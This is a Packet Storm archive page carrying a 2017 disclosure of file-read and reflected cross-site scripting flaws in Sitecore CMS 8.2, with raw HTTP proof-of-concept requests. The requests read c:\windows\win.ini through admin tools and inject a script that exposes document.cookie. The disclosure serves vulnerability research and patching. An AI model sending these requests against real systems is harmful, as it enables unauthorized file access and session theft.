Exploit the possiblities

Sitecore CMS 8.2 Cross Site Scripting / File Disclosure

Sitecore CMS 8.2 Cross Site Scripting / File Disclosure
Posted Jul 13, 2017
Authored by Usman Saeed

Sitecore CMS version 8.2 suffers from cross site scripting and file disclosure vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure
MD5 | 4858233c0ae712bdc0b065aba7a0cab1

Sitecore CMS 8.2 Cross Site Scripting / File Disclosure

Change Mirror Download
Exploit title: Sitecore CMS v8.2  multiple vulnerabilities
Product: Sitecore
Version: 8.2, Rev: 161221, Date: 21st December, 2016
Date: 05-05-2017
Author: Usman Saeed
Email: usman@xc0re.net <%20usman@xc0re.net>
Vendor Homepage: http://www.sitecore.net/


Disclaimer: Everything mentioned below is for educational puposes. The
vulnerability details are mentioned as is. I would not be held responsible
for any misuse of this information.

Summary:
Multiple vulnerabilities were found in the Sitecore product. The
vulnerabilities include two instances of arbitrary file access and once
instance of reflected cosssite scripting.

1: Arbitrary file access:

- Description:

The vulnerability lies in the tools which can be accessed via the
administrator user. The vulnerability exists because there is no bound
check for absolute path in the application, that is, if the absolute path
is provided to the vulnerable URL, it reads the path and shows the contents
of the file requested.

- Exploit:
1. Once authenticated as the administrator perform a GET request to the
followiung URL:
/sitecore/shell/Applications/Layouts/IDE.as <http://ide.as/>
px?fi=c:\windows\win.ini

2. Once authenticated as the administrator perform a POST request to the
followiung URL:

POST /sitecore/admin/LinqScratchPad.as <http://linqscratchpad.as/>px
HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 1463
Referer: <OMITTED>
Cookie: <OMITTED>
Connection: close
Upgrade-Insecure-Requests: 1

__VIEWSTATE= &__VIEWSTATEGENERATOR=
&__EVENTVALIDATION=&LinqQuery=%0D%0A&Reference=c%3A%5Cwindows%
5Cwin.in <http://5cwin.in/>i&Fetch=



2. Reflected Cross-site Scripting:
- Description:
The application does not sanatize the USER input which allows a normal
authenticated user to exploit this vulnerability.


- Exploit:

POST /sitecore/shell/Applications/Tools/Run HTTP/1.1
Host: <HOST>
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101
Firefox/53.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Referer: <OMITTED>
Content-Length: 518
Cookie: <OMITTED>

&__PARAMETERS=run%3Aok&__EVENTTARGET=&__EVENTARGUMENT=&__SOURCE=&__EVENTTYPE=click&__CONTEXTMENU=&__MODIFIED=1&__ISEVENT=1&__SHIFTKEY=&__CTRLKEY=&__ALTKEY=&__BUTTON=0&__KEYCODE=undefined&__X=1763&__Y=883&__URL=https%3A///sitecore/shell/Applications/Tools/Run&__CSRFTOKEN=
&__VIEWSTATE=&__VIEWSTATE=&Program=%3F%3E%3C%3F%3E%3Ciframe%20src%3D%22Javascript%3Aalert(
document.cookie)%3B%22%3E%3C%2Fiframe%3E

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    19 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close